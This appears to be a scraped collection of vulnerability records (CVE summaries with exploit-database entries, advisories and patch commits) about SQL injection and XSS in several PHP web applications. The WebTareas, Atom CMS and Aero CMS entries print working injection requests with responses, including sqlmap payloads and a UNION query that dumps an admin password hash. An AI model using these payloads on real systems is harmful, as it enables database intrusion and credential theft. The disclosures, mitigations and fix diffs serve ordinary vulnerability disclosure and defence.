WebTareas version 2.4 suffers from a remote blind SQL injection vulnerability. Original discovery of this issue in this version is attributed to Behrad Taher in May of 2022. Related CVE number: CVE-2021-43481.

# Exploit Title: WebTareas 2.4 - SQL Injection (Unauthorised) # Date: 15/10/2022# Exploit Author: Hubert Wojciechowski# Contact Author: hub.woj12345@gmail.com# Vendor Homepage: https://sourceforge.net/projects/webtareas/# Software Link: https://sourceforge.net/projects/webtareas/# Version: 2.4# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23## Example -----------------------------------------------------------------------------------------------------------------------Param: webTareasSID in cookie-----------------------------------------------------------------------------------------------------------------------Req-----------------------------------------------------------------------------------------------------------------------GET /webtareas/administration/admin.php HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: pl,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://127.0.0.1/webtareas/general/login.php?msg=logoutConnection: closeCookie: webTareasSID=Mt%ezS%00%07contCtxNzS%00%06_itemsVl%00%00%00%02S%00%03fooS%00%03barzzR%00%00%00%01Mt%001com.sun.org.apache.xpath.internal.objects.XStringS%00%05m_objS%00%04%eb%a7%a6%0f%1a%0bS%00%08m_parentNzR%00%00%00%12z''Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1-----------------------------------------------------------------------------------------------------------------------Res:-----------------------------------------------------------------------------------------------------------------------HTTP/1.1 302 FoundDate: Sat, 15 Oct 2022 11:38:50 GMTServer: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30X-Powered-By: PHP/7.4.30Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheLocation: ../service_site/home.php?msg=permissiondeniedContent-Length: 0Connection: closeContent-Type: text/html; charset=UTF-8-----------------------------------------------------------------------------------------------------------------------Req-----------------------------------------------------------------------------------------------------------------------GET /webtareas/administration/admin.php HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: pl,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://127.0.0.1/webtareas/general/login.php?msg=logoutConnection: closeCookie: webTareasSID=Mt%ezS%00%07contCtxNzS%00%06_itemsVl%00%00%00%02S%00%03fooS%00%03barzzR%00%00%00%01Mt%001com.sun.org.apache.xpath.internal.objects.XStringS%00%05m_objS%00%04%eb%a7%a6%0f%1a%0bS%00%08m_parentNzR%00%00%00%12z'Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1-----------------------------------------------------------------------------------------------------------------------Res:-----------------------------------------------------------------------------------------------------------------------HTTP/1.1 302 FoundDate: Sat, 15 Oct 2022 11:38:39 GMTServer: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30X-Powered-By: PHP/7.4.30Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheLocation: ../service_site/home.php?msg=permissiondeniedContent-Length: 355Connection: closeContent-Type: text/html; charset=UTF-8You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'javax.naming.spi.ContinuaS' at line 1(1064) Warning: Unknown: Failed to write session data using user defined save handler. (session.save_path: E:\xampp_php7\tmp) in Unknown on line 0 -----------------------------------------------------------------------------------------------------------------------SQLMap:-----------------------------------------------------------------------------------------------------------------------sqlmap resumed the following injection point(s) from stored session:---Parameter: Cookie #1* ((custom) HEADER) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: webTareasSID=Mt%00%00Mt%00%17com.caucho.naming.QNameS%00%08_contextMt%00' AND (SELECT 7431 FROM(SELECT COUNT(*),CONCAT(0x717a717071,(SELECT (ELT(7431=7431,1))),0x71716a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wBnB; qdPM8=grntkihirc9efukm73dpo1ktt5; PHPSESSID=nsv9pmko3u7rh0s37cd6vg2ko1 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: webTareasSID=Mt%00%00Mt%00%17com.caucho.naming.QNameS%00%08_contextMt%00' AND (SELECT 7004 FROM (SELECT(SLEEP(5)))BFRG)-- Oamh; qdPM8=grntkihirc9efukm73dpo1ktt5; PHPSESSID=nsv9pmko3u7rh0s37cd6vg2ko1 [11:49:03] [INFO] testing MySQL [11:49:03] [INFO] confirming MySQL do you want to URL encode cookie values (implementation specific)? [Y/n] Y [11:49:03] [INFO] the back-end DBMS is MySQL web application technology: PHP 7.4.30, Apache 2.4.54 back-end DBMS: MySQL >= 5.0.0 (MariaDB fork) [11:49:03] [INFO] fetching database names [11:49:04] [INFO] starting 6 threads [11:49:06] [INFO] retrieved: 'zxcv' [11:49:06] [INFO] retrieved: 'information_schema' [11:49:06] [INFO] retrieved: 'performance_schema' [11:49:06] [INFO] retrieved: 'test' [11:49:06] [INFO] retrieved: 'phpmyadmin' [11:49:06] [INFO] retrieved: 'mysql' available databases [6]: [*] information_schema [*] mysql [*] performance_schema [*] phpmyadmin [*] test [*] zxcv [11:49:06] [INFO] fetched data logged to text files under 'C:\Users\48720\AppData\Local\sqlmap\output\127.0.0.1' [11:49:06] [WARNING] your sqlmap version is outdated [*] ending @ 11:49:06 /2022-10-15/

WebTareas 2.4 SQL Injection

Apache InLong versions from 1.1.0 through 1.5.0 are vulnerable to Java Database Connectivity (JDBC) deserialization of untrusted data from the MySQL JDBC URL in MySQLDataNode. It could be triggered by authenticated users of InLong. This has been patched in version 1.6.0. Users are advised to upgrade to Apache InLong's latest version or cherry-pick the [patch](https://github.com/apache/inlong/pull/7422) to solve it.

**Apache InLong vulnerable to JDBC Deserialization of Untrusted Data**

High severity GitHub Reviewed Published Mar 27, 2023 to the GitHub Advisory Database • Updated Mar 27, 2023

GHSA-gpqq-59rp-3c3w: Apache InLong vulnerable to JDBC Deserialization of Untrusted Data

Atom CMS version 2.0 suffers from a remote SQL injection vulnerability. Original discovery of this issue in this version is attributed to Luca Cuzzolin in February of 2022.

    # Exploit Title: Atom CMS v2.0 - SQL Injection (no auth)# Date: 15/10/2022# Exploit Author: Hubert Wojciechowski# Contact Author: hub.woj12345@gmail.com# Vendor Homepage: https://github.com/thedigicraft/Atom.CMS# Software Link: https://github.com/thedigicraft/Atom.CMS# Version: 2.0# Tested on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23## Example-----------------------------------------------------------------------------------------------------------------------Param: id-----------------------------------------------------------------------------------------------------------------------Req-----------------------------------------------------------------------------------------------------------------------POST /Atom.CMS-master/admin/index.php?page=users&id=(select*from(select(sleep(10)))a) HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: pl,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 93Origin: http://127.0.0.1Connection: closeReferer: http://127.0.0.1/Atom.CMS-master/admin/index.php?page=users&id=1Cookie: phpwcmsBELang=en; homeMaxCntParts=10; homeCntType=24; PHPSESSID=k3a5d2usjb00cd7hpoii0qgj75Upgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1first=Alan2n&last=Quandt&email=alan%40alan.com&status=1&password=&passwordv=&submitted=1&id=1--------------------------------------------------------------------------------------------------------------------- --Response wait 10 sec-----------------------------------------------------------------------------------------------------------------------Other URL and params-----------------------------------------------------------------------------------------------------------------------/Atom.CMS-master/admin/index.php [email]/Atom.CMS-master/admin/index.php [id]/Atom.CMS-master/admin/index.php [slug]/Atom.CMS-master/admin/index.php [status]/Atom.CMS-master/admin/index.php [user]

Atom CMS 2.0 SQL Injection

Aero CMS version 0.0.1 suffers from multiple remote SQL injection vulnerabilities. Original discovery of this issue in this version is attributed to nu11secur1ty in August of 2022.

# Exploit Title: Aero CMS v0.0.1 - SQL Injection (no auth)# Date: 15/10/2022# Exploit Author: Hubert Wojciechowski# Contact Author: hub.woj12345@gmail.com# Vendor Homepage: https://github.com/MegaTKC/AeroCMS# Software Link: https://github.com/MegaTKC/AeroCMS# Version: 0.0.1# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23## Example SQL Injection-----------------------------------------------------------------------------------------------------------------------Param: search-----------------------------------------------------------------------------------------------------------------------Req sql ini detect-----------------------------------------------------------------------------------------------------------------------POST /AeroCMS-master/search.php HTTP/1.1Host: 127.0.0.1Cookie: PHPSESSID=g49qkbeug3g8gr0vlsufqa1g57Origin: http://127.0.0.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Upgrade-Insecure-Requests: 1Referer: http://127.0.0.1/AeroCMS-master/Content-Type: application/x-www-form-urlencodedAccept-Language: en-US;q=0.9,en;q=0.8Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36Connection: closeCache-Control: max-age=0Content-Length: 21search=245692'&submit=-----------------------------------------------------------------------------------------------------------------------Res:-----------------------------------------------------------------------------------------------------------------------HTTP/1.1 200 OKDate: Sat, 15 Oct 2022 03:07:06 GMTServer: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40X-Powered-By: PHP/5.6.40Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheContent-Length: 3466Connection: closeContent-Type: text/html; charset=UTF-8[...]Query failed You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '%'' at line 1-----------------------------------------------------------------------------------------------------------------------Req-----------------------------------------------------------------------------------------------------------------------POST /AeroCMS-master/search.php HTTP/1.1Host: 127.0.0.1Cookie: PHPSESSID=g49qkbeug3g8gr0vlsufqa1g57Origin: http://127.0.0.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Upgrade-Insecure-Requests: 1Referer: http://127.0.0.1/AeroCMS-master/Content-Type: application/x-www-form-urlencodedAccept-Language: en-US;q=0.9,en;q=0.8Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36Connection: closeCache-Control: max-age=0Content-Length: 21search=245692''&submit=-----------------------------------------------------------------------------------------------------------------------Res:-----------------------------------------------------------------------------------------------------------------------HTTP/1.1 200 OKDate: Sat, 15 Oct 2022 03:07:10 GMTServer: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40X-Powered-By: PHP/5.6.40Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheConnection: closeContent-Type: text/html; charset=UTF-8Content-Length: 94216[...]-----------------------------------------------------------------------------------------------------------------------Req exploiting sql ini get data admin-----------------------------------------------------------------------------------------------------------------------POST /AeroCMS-master/search.php HTTP/1.1Host: 127.0.0.1Cookie: PHPSESSID=g49qkbeug3g8gr0vlsufqa1g57Origin: http://127.0.0.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Upgrade-Insecure-Requests: 1Referer: http://127.0.0.1/AeroCMS-master/Content-Type: application/x-www-form-urlencodedAccept-Language: en-US;q=0.9,en;q=0.8Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36Connection: closeCache-Control: max-age=0Content-Length: 113search=245692'+union+select+1,2,group_concat(username,char(58),password),4,5,6,7,8,9,10,11,12+from+users#&submit=-----------------------------------------------------------------------------------------------------------------------Res:-----------------------------------------------------------------------------------------------------------------------HTTP/1.1 200 OKDate: Sat, 15 Oct 2022 05:40:05 GMTServer: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40X-Powered-By: PHP/5.6.40Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheConnection: closeContent-Type: text/html; charset=UTF-8Content-Length: 101144[...] <a href="#">admin:$2y$12$0BgqODF66TD.JZxL5MVRlOEIvap9XzkBEMVEeHyHe6RiOxdGrx3Ne,admin:$2y$12$0BgqODF66TD.JZxL5MVRlOEIvap9XzkBEMVEeHyHe6RiOxdGrx3Ne</a>[...]-----------------------------------------------------------------------------------------------------------------------Other URL and params-----------------------------------------------------------------------------------------------------------------------/AeroCMS-master/admin/posts.php [post_title]/AeroCMS-master/admin/posts.php [filename]/AeroCMS-master/admin/profile.php [filename]/AeroCMS-master/author_posts.php [author]/AeroCMS-master/category.php [category]/AeroCMS-master/post.php [p_id]/AeroCMS-master/search.php [search]/AeroCMS-master/admin/categories.php [cat_title]/AeroCMS-master/admin/categories.php [phpwcmsBELang cookie]/AeroCMS-master/admin/posts.php [post_content]/AeroCMS-master/admin/posts.php [p_id]/AeroCMS-master/admin/posts.php [post_category_id]/AeroCMS-master/admin/posts.php [post_title]/AeroCMS-master/admin/posts.php [reset]

Aero CMS 0.0.1 SQL Injection

Phpgurukul Park Ticketing Management System 1.0 is vulnerable to Cross Site Scripting (XSS) via the Admin Name parameter.

_\# Exploit Title: PARK TICKETING MANAGEMENT SYSTEM — Stored XSS Vulnreability.  
\# Date: 25–01–2023  
\# Exploit Author: Venkata Siva Kumar Medituru  
\# Vendor Homepage:_ _https://phpgurukul.com/__\# Software Link:_ _https://phpgurukul.com/park-ticketing-management-system-using-php-and-mysql/__\# Vulnerable Parameter : Admin Name  
\# Version: 1.0  
\# Tested on: Windows 10  
\# Contact:_ _https://www.linkedin.com/in/shivakumar-m-v/_

XSS is an attack technique that injects malicious code into vulnerable web applications. Unlike other attacks, this technique does not target the web server itself, but the user’s browser.

Stored XSS is a type of XSS that stores malicious code on the application server. Using stored XSS is only possible if your application is designed to store user input.

The Reproducive Steps are given in Video PoC.

Remediation :

01) Use Web Application Firewall.

02) Input validation.

CVE-2023-26958: Stored XSS — PARK TICKETING MANAGEMENT SYSTEM(Phpgurukul)

Phpgurukul Park Ticketing Management System 1.0 is vulnerable to SQL Injection via the User Name parameter.

> \# Exploit Title: PARK TICKETING MANAGEMENT SYSTEM — SQL Injection Vulnreability.  
> \# Date: 25–01–2023  
> \# Exploit Author: Venkata Siva Kumar Medituru  
> \# Vendor Homepage: https://phpgurukul.com/  
> \# Software Link: https://phpgurukul.com/park-ticketing-management-system-using-php-and-mysql/  
> \# Vulnerable Parameter : User Name  
> \# Version: 1.0  
> \# Tested on: Windows 10  
> \# Contact: https://www.linkedin.com/in/shivakumar-m-v/

SQL injection is a technique used to exploit the Authentication pages and intruder can penetrate into dashboard without any valid credentials. The perpetrator may enumerate User name, personal information, App functionality and in other words complete account take over is possible.

The reproducive steps are given in vidoe PoC.

> **Mitigations**

01) Configure Web Application Firewall to understand various SQL payloads and to ignore / drop the malicious requests crafted by perpetrator

02) Implement input validations and parametrized queries including prepared statements.

03) Limit the verbose error messages in the responses so that attacker not able to figure out the way to bypass the implemented controls.

CVE-2023-26959: Authentication Bypass — PARK TICKETING MANAGEMENT SYSTEM(Phpgurukul)

HGiga MailSherlock mail query function has vulnerability of insufficient validation for user input. An authenticated remote attacker with administrator privilege can exploit this vulnerability to inject SQL commands to read, modify, and delete the database. 

:::

* 勒索軟體防護專區
* 遠距辦公資安專區
* 回首頁
* 網站導覽
* 訂閱電子報
* English

****

* 資安通報
* Wannacry
* 駭客
* 勒索
* 手機

* 新聞公告News
 * 公告事項
 * 資安新聞
 * 資安活動
 * 電子報
* 資安服務Services
 * 資安通報
 * 一般資安通報
 * 資安聯盟
 * 資安聯盟簡介
 * 規章及會員申請暨異動申請
 * 台灣漏洞揭露平台 (TVN)
 * TVN (Taiwan Vulnerability Note) 漏洞公告
 * 漏洞揭露政策
 * 漏洞通報
 * 惡意檔案檢測服務 (Virus Check)
 * 網路釣魚通報 (Phishing Check)
 * 網路釣魚通報
 * 釣魚網站列表
* 資安宣導Advocacy
 * 勒索軟體威脅防護專區
 * 遠距辦公資安專區
 * 軟硬體漏洞警訊
 * 威脅分析報告
 * 資安小知識
 * 資訊安全宣導
 * 資安宣導影音
 * 公開文件
* 相關網站Links
 * 國內資安組織
 * 國際資安組織
 * 網路資源
* 關於我們About us
 * 中心簡介
 * 活動紀事
 * 歷年年會活動網站
 * 活動花絮
 * PGP KEY
 * 聯絡我們
 * 合作夥伴

:::

* 首頁
* 資安服務
* 台灣漏洞揭露平台 (TVN)
* TVN (Taiwan Vulnerability Note) 漏洞公告

TVN ID

TVN-202302008

CVE ID

CVE-2023-24840

CVSS

7.2 (High) 
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

影響產品

HGiga MailSherlock 
系統版本：v4.5 
系統套件：iSherlock-query-4.5 <= 4.5-167

問題描述

MailSherlock信件查詢功能未對使用者輸入之參數進行驗證，遠端攻擊者以管理者權限登入後，即可注入任意SQL語法讀取、修改及刪除資料庫。

解決方法

更新MailSherlock之iSherlock-query系統套件至iSherlock-query-4.5-168.386.rpm

漏洞通報者

Dong-Jie Chen (CHT Security)

公開日期

2023-02-24

CVE-2023-24840: HGiga MailSherlock - SQL Injection

In Cerebrate 1.13, a blind SQL injection exists in the searchAll API endpoint.

Skip to content

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    
    *   Explore
    *   All features
    *   Documentation
    *   GitHub Skills
    *   Blog
    
*   *   For
    *   Enterprise
    *   Teams
    *   Startups
    *   Education
    
    *   By Solution
    *   CI/CD & Automation
    *   DevOps
    *   DevSecOps
    
    *   Case Studies
    *   Customer Stories
    *   Resources
    
*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
    *   Repositories
    *   Topics
    *   Trending
    *   Collections
    
*   Pricing

*   Notifications
*   Fork 14

*   Code
*   Issues 60
*   Pull requests 2
*   Actions
*   Projects 3
*   Wiki
*   Security
*   Insights

Permalink

Browse files

fix: \[security\] blind SQL injection in searchAll

\- As reported by Zigrin Security

*   Loading branch information

Showing **2 changed files** with **2 additions** and **1 deletion**.

*   *   *   InstanceController.php
    *   *   InstanceTable.php

@@ -38,6 +38,7 @@ public function searchAll()

$searchValue = $this\->request\->getQuery('search');

$model = $this\->request\->getQuery('model', null);

$limit = $this\->request\->getQuery('limit', 5);

$limit = is\_numeric($limit) ? $limit : 5;

if (!empty($this\->request\->getQuery('show\_all', false))) {

$limit = null;

}

@@ -81,7 +81,7 @@ public function getStatistics(int $days=30): array

return $statistics;

}

  

public function searchAll($value, $user, $limit\=5, $model\=null)

public function searchAll($value, $user, int $limit\=5, $model\=null)

{

$results = \[\];

$models = $this\->seachAllTables;

**0 comments on commit 5f1c99c**

Please sign in to comment.

CVE-2023-28883: fix: [security] blind SQL injection in searchAll · cerebrate-project/cerebrate@5f1c99c

A vulnerability was found in grinnellplans-php up to 3.0. It has been declared as critical. Affected by this vulnerability is the function interface_disp_page/interface_disp_page of the file read.php. The manipulation leads to sql injection. The attack can be launched remotely. The name of the patch is 57e4409e19203a94495140ff1b5a697734d17cfb. It is recommended to apply a patch to fix this issue. The identifier VDB-223801 was assigned to this vulnerability.

@@ -71,7 +71,7 @@ interface\_disp\_page($page); if (User::logged\_in()) { //TODO add searchname instead? $page\->url = add\_param($page\->url, 'searchnum', $searchnum); $addtolist = (isset($\_POST\['addtolist'\]) ? $\_POST\['addtolist'\] : false); $addtolist = (isset($\_POST\['addtolist'\]) ? (bool)$\_POST\['addtolist'\] : false); // if person is manipulating which tier this plan is on their autoread list if (isset($\_POST\['block\_user'\])) { if ($\_POST\['block\_user'\] == 1) { @@ -91,12 +91,12 @@ interface\_disp\_page($page); $msg = new InfoText("User " . $planinfo\[0\]\[0\] . " has been unblocked."); } $page\->append($msg); } else if ($addtolist == 1) { $privlevel = (isset($\_POST\['privlevel'\]) ? $\_POST\['privlevel'\] : 0); } else if ($addtolist) { $privlevel = (isset($\_POST\['privlevel'\]) ? (int)$\_POST\['privlevel'\] : 0); if ($privlevel == 0) { mysql\_query("DELETE FROM autofinger WHERE owner = '$idcookie' and interest = '$searchnum'"); $yay = new InfoText("User " . $planinfo\[0\]\[0\] . " removed from your autoread list."); } else { } else if ($privlevel > 0 && $privlevel <= 3) { mysql\_query("INSERT INTO autofinger (owner, interest, priority) VALUES ('$idcookie', '$searchnum', '$privlevel') ON DUPLICATE KEY UPDATE priority=$privlevel"); $yay = new InfoText("User " . $planinfo\[0\]\[0\] . " is now on your autoread list with priority level of " . $privlevel . "."); }

CVE-2015-10097: Fix SQL injection in read.php's  - thanks, stjohns\! · grinnellplans/grinnellplans-php@57e4409

Dataease is an open source data visualization and analysis tool. The blacklist for SQL injection protection is missing entries. This vulnerability has been fixed in version 1.18.5. There are no known workarounds.

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Tag

#sql